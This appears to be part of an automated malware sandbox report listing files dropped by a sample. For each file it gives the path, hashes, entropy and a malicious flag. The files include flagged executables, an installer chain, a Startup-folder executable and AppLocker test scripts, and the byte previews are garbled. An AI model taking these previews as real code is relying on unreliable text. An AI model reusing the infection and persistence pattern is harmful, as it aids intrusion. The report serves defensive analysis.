                                                                                                                                            Preview:...........e..........................h.....d.d.l.Z...d.d.l.Z.n.#.e.$.r...Y.n.w.x.Y.w...e.j.........j.........Z.d.S.#.e.$.r...d...Z.Y.d.S.w.x.Y.w.)......Nc.....................@.....|.j...............................|.j.......................S.).N)...loader..load_module..name)...specs.... .iC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\py34compat.py..module_from_specr........s..........{..&..&.t.y..1..1..1.....)...importlib..importlib.util..ImportError..utilr......AttributeError..r....r......<module>r........s................................................................D............2.. .~..6.................2....2....2....2....2....2....2....2....2....2...s..................%...1...1.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27358
                                                                                                                                            Entropy (8bit):5.338918108301592
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:dB3nhYEo+wjuuuXuuMijM5tiiRA+lhxV+:Lhdo+wjuuuXuup8zOEV+
                                                                                                                                            MD5:CEB458C960CD25376391499672F35E1D
                                                                                                                                            SHA1:6C2916CDB897D84F8B59F664DFA2D4268A70DC5D
                                                                                                                                            SHA-256:F69E264845364E6FEFB55ED2AA4587E3248B9C0E658BE44AF29AC0D90B0F6C18
                                                                                                                                            SHA-512:F4AC63D0102F467D2F209E5CA28514E5FDE605EB9FE89B1B4EB1AC9E6778B4636AE775B83DAC9EF14498391C3237790F6569BD64099588273212308DCF875510
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.8........................H.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...............................d...............r.d.d.l.m.c...m.c...m.c...m.Z...n.e.j.........e.j...................Z...e.Z.n.#.e.$.r...d.Z.Y.n.w.x.Y.w.e.Z.g.d...Z.d d...Z.e.j.........d d.................Z e.j.........d.................Z!e.j.........d.................Z"e.j.........d.................Z#..G.d...d.e$..............Z%..G.d...d...............Z&e.j.........d.................Z'd...Z(e.j.........d.................Z)e.j.........d.................Z*h.d...Z+d...Z,d...Z-d...Z...G.d...d...............Z/..e0e.d...............r.e.j1........g.Z2n.g.Z2..G.d...d.e/..............Z3..e.j4........e.j5........d...d..6..................................D.............................Z7..G.d...d.e...............Z8d.S.)!.....N)...DistutilsError)...working_set..java)...AbstractSandbox..DirectorySandbox..SandboxViolation..run_setupc....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):218
                                                                                                                                            Entropy (8bit):4.933979931150322
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:SWtKjcyXrvEXFov66Ji+DqMedPKejpCYI+dLC9:nKZJvVEPLlClOLC9
                                                                                                                                            MD5:762D226E24C456568A2F4305151094BE
                                                                                                                                            SHA1:982302A6A5664F02C8CC87407DC7F2F5B5FBD825
                                                                                                                                            SHA-256:454CD0CC2414697B7074BB581D661B21098E6844B906BAAAD45BD403FB6EFB92
                                                                                                                                            SHA-512:AB81BAF791AAFBA3391DFC0EBD32A87EC4820E044BC5CF53FAD7D27DABFA87D4979F76164EF017B3F5FD3DAEE544BF724B67D01E0EF8B72B6FA3223E5F23DD48
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# EASY-INSTALL-DEV-SCRIPT: %(spec)r,%(script_name)r.__requires__ = %(spec)r.__import__('pkg_resources').require(%(spec)r).__file__ = %(dev_path)r.with open(__file__) as f:. exec(compile(f.read(), __file__, 'exec')).
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):138
                                                                                                                                            Entropy (8bit):4.782879665178461
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:SWsiKQ3shBMZoWGXrWWbpW6iFoqM/66JiWOQfDBWVSEqbZhGbWWun:SWtKQXyXrvEXFov66Ji+DgVSEqlhGban
                                                                                                                                            MD5:C7C13D61B7887915BFC911031126AF09
                                                                                                                                            SHA1:FA9B9F2E89357C8597490720B623D3B875136773
                                                                                                                                            SHA-256:5864EDE6989ECCEDBB73E0DBC7A9794384F715FDB4039CFBF3BDA1BF76808586
                                                                                                                                            SHA-512:1E115F1555DA61D2EF330FDE94010A0138C4D761342EA02B109B21F11F2E4EE59243B4137CB72FAFDF2347A4C56CE453E239E838E446EFD01A69706D25B6FBA0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# EASY-INSTALL-SCRIPT: %(spec)r,%(script_name)r.__requires__ = %(spec)r.__import__('pkg_resources').run_script(%(spec)r, %(script_name)r).
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1844
                                                                                                                                            Entropy (8bit):5.204041146560013
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:0u+xOuN2mNrV7NF3A9KxCI5UNPN5zCZoqZMA3Xm:3juhBxZ8sl5oPN5GKqZpXm
                                                                                                                                            MD5:8849C94D76261B6AEB7BC1DA40AEAE63
                                                                                                                                            SHA1:FDAD0B7BE64C992F3128841C7367F8FFC5C71E7A
                                                                                                                                            SHA-256:9253E76BE0645C87783CD7D9F225F9A636834726887AD5ECC536F04C4A136434
                                                                                                                                            SHA-512:7DEB39BBA00A7E8BB80618B874ED48CEFC09A5FBD24517ABA785EAA4A6CE8EF142D210217DA9647CA65C01A04DB628D51AFC709C1EFBC437DCF756A035A6E185
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................(.....d.d.l.Z.d.d.l.Z.d...Z.d...Z.d...Z.d.S.)......Nc...........................t...........|.t.........................r.t...........j.........d.|...............S...|.......................d...............}.t...........j.........d.|...............}.|.......................d...............}.n.#.t...........$.r...Y.n.w.x.Y.w.|.S.).N..NFD..utf-8)...isinstance..str..unicodedata..normalize..decode..encode..UnicodeError)...paths.... .lC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\unicode_utils.py..decomposer........s..........$............2.....$.U.D..1..1..1.........{.{.7..#..#.......$.U.D..1..1......{.{.7..#..#........................................Ks.....?A,..,.A9..8.A9.c..........................t...........|.t.........................r.|.S.t...........j.......................p.d.}.|.d.f.}.|.D.])}...|.......................|...............c...S.#.t...........$.r...Y..&w.x.Y.w.d.S.).zY. Ensure that t
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):462
                                                                                                                                            Entropy (8bit):5.411779876215473
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Bd//3IcPWCLO/2IpRVpy5agAj3VbTVdVd93m00MUM0:vXYcPWj2mlgALV3VdVd9200MUM0
                                                                                                                                            MD5:51976287C64F1F4503EB5B3C9D920D1D
                                                                                                                                            SHA1:B1C80570F63CB34E6BB303BCE14058B60A35D481
                                                                                                                                            SHA-256:29EC6148F9805FB51E6E8BD90A77011F55097F6F4B14A1E87F6A8831D89EFC6D
                                                                                                                                            SHA-512:46365B50CC2B0F4C8EA96A65B68B5397711DC3078429FE2C3DF2B5C5D4C3944F9B71EBF1D7B797A3B0612D2B66AF2BEBF5CC05C17FB12C60B6B79A96A9853BD8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................V.....d.d.l.Z.....e.j.........d...............j.........Z.d.S.#.e.$.r...d.Z.Y.d.S.w.x.Y.w.)......N..setuptools..unknown)...pkg_resources..get_distribution..version..__version__..Exception........fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\version.py..<module>r........sU...........................0.-..0....>..>..F.K.K.K.......................K.K.K.K........s..........(...(.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15518
                                                                                                                                            Entropy (8bit):5.159095610497636
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:auKPGbBtXNsJqLdid59p2ADrynMxlTlDXqP4ZhsJ:auKUB8GduD4A1ThXqQZ2J
                                                                                                                                            MD5:5FB2E502BAE4E31B8F178EB7479864FF
                                                                                                                                            SHA1:CF6F575553D6400C405D553FCB1D7A83687C6DD1
                                                                                                                                            SHA-256:2D972E462E71A8CBC56674FB5B6EA8F81166B96BEB36B201C14F9A223F5C9DE1
                                                                                                                                            SHA-512:AF99F1CB660C027306E62CB2700279B34C34A335EDD23C7882BC5F806B9848A6D2C3B1C1A37B6F09B09094A42D9802BC08D902D71980061808F5A15CE9E1591B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e. ..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.........d.e.j.......................j.........Z.d.Z.d...Z.e.j.........d.................Z...G.d...d...............Z.d.S.).z.Wheels support......N)...get_platform)...parse_version)...sys_tags)...canonicalize_name)...write_requirements)..._unpack_zipfile_objz.^(?P<project_name>.+?)-(?P<version>\d.*?). ((-(?P<build>\d.*?))?-(?P<py_version>.+?)-(?P<abi>.+?)-(?P<platform>.+?). )\.whl$z8__import__('pkg_resources').declare_namespace(__name__).c...........................t...........j.........|...............D...])\...}.}.}.t...........j...............................|.|...............}.|.D.]X}.t...........j...............................|.|...............}.t...........j...............................|.|.|...............}.t...........j.........|.|..................Yt...........t...........t...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1459
                                                                                                                                            Entropy (8bit):5.379116763081545
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Qk+Ia6LyBPU2mL+lLLgVcvZ1NbAMby8nMNvtTx9:Qk+bIT2mL+gmZ1LOhNFTx9
                                                                                                                                            MD5:33C938D33990B726C240197713A3E7E5
                                                                                                                                            SHA1:B6C442B5705840C1187C9BF438A897FD15AAED42
                                                                                                                                            SHA-256:7D150263D41BFBFC89AFB4922D5AD69C732F55DD06A6DF596B246DA1958CBBD5
                                                                                                                                            SHA-512:18E2DD7FC3C2635A7AABDDBA1DEFD1CC9EF35A92F479D572CB4D6A7583316E7520F8CC30D2AE54EC85946AC9671A134A9FE0B89355F0941EA406995C2C67E2FB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................*.....d.d.l.Z.d...Z.e.d.................Z.d.S.)......Nc.....................:.....t...........j.......................d.k.....r.d...S.|.S.).N..Windowsc...........................d.S.).N..)...args..kwargss.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\windows_support.py..<lambda>z.windows_only.<locals>.<lambda>....s.......t.......)...platform..system)...funcs.... r......windows_onlyr........s#.................I..%..%..+..+..+....Kr....c...........................d.d.l.}.t...........d.................|.j.........j.........j.........}.|.j.........j.........|.j.........j.........f.|._.........|.j.........j.........|._.........d.}...|.|.|...............}.|.s.|.......................................d.S.).z.. Set the hidden attribute on a file or directory... From http://stackoverflow.com/questions/19622133/.. `path` must be text.. r....Nz.ctypes.wintypes.....)...ctypes..__import__..windll..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67352
                                                                                                                                            Entropy (8bit):6.146621901948148
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:rw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJSy:8/5k8cnzeJf9IPL037SyG3Px
                                                                                                                                            MD5:B711598FC3ED0FE4CF2C7F3E0877979E
                                                                                                                                            SHA1:299C799E5D697834AA2447D8A313588AB5C5E433
                                                                                                                                            SHA-256:520169AA6CF49D7EE724D1178DE1BE0E809E4BDCF671E06F3D422A0DD5FD294A
                                                                                                                                            SHA-512:B3D59EFF5E38CEF651C9603971BDE77BE7231EA8B7BDB444259390A8A9E452E107A0B6CB9CC93E37FD3B40AFB2BA9E67217D648BFCA52F7CDC4B60C7493B6B84
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5762840
                                                                                                                                            Entropy (8bit):6.089392282930885
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                                                                                                            MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                                                                                                            SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                                                                                                            SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                                                                                                            SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):89880
                                                                                                                                            Entropy (8bit):6.5375654036547255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:fTSVLL1/VfZPtsO6nBy0r8Z3j5X7K0d4HIH8d2//zoXnf7toecbNCOAS7Z:fW/tB8n8F4i/LoXfeecbNCA
                                                                                                                                            MD5:23105A395B807D9335219958B4D0CEC1
                                                                                                                                            SHA1:FB60050D82E3BC1BE3B10877B9355F5D48E04854
                                                                                                                                            SHA-256:61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5
                                                                                                                                            SHA-512:EF91D19E632D0D146FA68D52BEB04FFCB9B972079CD9C255F44EA5201637A8B00907EC8E3358C7B5CC37338470E29E43DBAEC7DDC0562810B49AB2E8115CC805
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3198976
                                                                                                                                            Entropy (8bit):6.66194464256937
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:0RDfGY4MzqVDFDJKt+yEVlISupM+Gr9Jcx2gKG:sbGY4M8JDJy+yEVubM+GBJc8
                                                                                                                                            MD5:38560B590890A37AB8460092560D282C
                                                                                                                                            SHA1:2564DAC98B8ED26FCCAED9764F172C9123E50F2B
                                                                                                                                            SHA-256:014857E05F8C8ABACE4CCF74A6E613A755A651D724C510DC5959BEA75295F53B
                                                                                                                                            SHA-512:5A5B0869092B690AC373D03916142C454D88FCB7ABD26CEEBE738E2DF1D09416F19E0F73163050F1E45C3DABA980B1714193A79CAB84661277D11B455326F368
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................1.......1...@.................................W...k.............................0.............................l.0..................................................... . ............................@....rsrc...............................@....idata ............................@...mrenudwa. *.......*.................@...qxwztaye......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1181184
                                                                                                                                            Entropy (8bit):6.401110768123626
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
                                                                                                                                            MD5:BCC236A3921E1388596A42B05686FF5E
                                                                                                                                            SHA1:43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
                                                                                                                                            SHA-256:43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
                                                                                                                                            SHA-512:E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.745960477552938
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6144
                                                                                                                                            Entropy (8bit):4.215994423157539
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23312
                                                                                                                                            Entropy (8bit):4.596242908851566
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.745960477552938
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6144
                                                                                                                                            Entropy (8bit):4.215994423157539
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23312
                                                                                                                                            Entropy (8bit):4.596242908851566
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2625536
                                                                                                                                            Entropy (8bit):6.537979655585314
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:5f0h+NftcnTMnrLafwGzMwGy95OkO42/h9C+hIXSlDFGI/MEEsdD/gVm:W+NfSYnAwGzfb5xO42ZailDREEEO
                                                                                                                                            MD5:382DC2CC6405B237FA73B03EF0B52327
                                                                                                                                            SHA1:1FD284AF02569B01C46F81C67E419305B1CF4628
                                                                                                                                            SHA-256:F5A2F62F2BAC02EAB7FD22D868C5FA5AB61B517BFECC5C251817B6F9020E73C2
                                                                                                                                            SHA-512:6AD4C1819F11ACD02DC8A3CCBD19E516DCC92C5DD53A9C2ECA935E8615FF7024DB14E3072B786468343EFFBE66479C65C139555500B904FC0E337ABAFD791DFC
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1203559
                                                                                                                                            Entropy (8bit):6.37383440477572
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94o:yGUhni7iSFCQ9X
                                                                                                                                            MD5:FE0DF3346232B47B76BB20F85900D8C2
                                                                                                                                            SHA1:21CA0B32E39EAEE2F21698EF5912EF8E9418AED7
                                                                                                                                            SHA-256:B097953351A17692EA89A98F9114246A8685291020E3F40388754D5552ED19BB
                                                                                                                                            SHA-512:75DDBAF4BC249DFE7CAF0F2E2EA9275C43CB8FC5BBD97D293E396F31DB1395BA12DBC0F5E5792C20F1D10EE5378A4B4005B112F851AB870EC12FD50680FF9803
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:InnoSetup Log Livid Pocket, version 0x418, 3427 bytes, 932923\37\user\376, C:\Users\user\AppData\Local\376\377\377\0
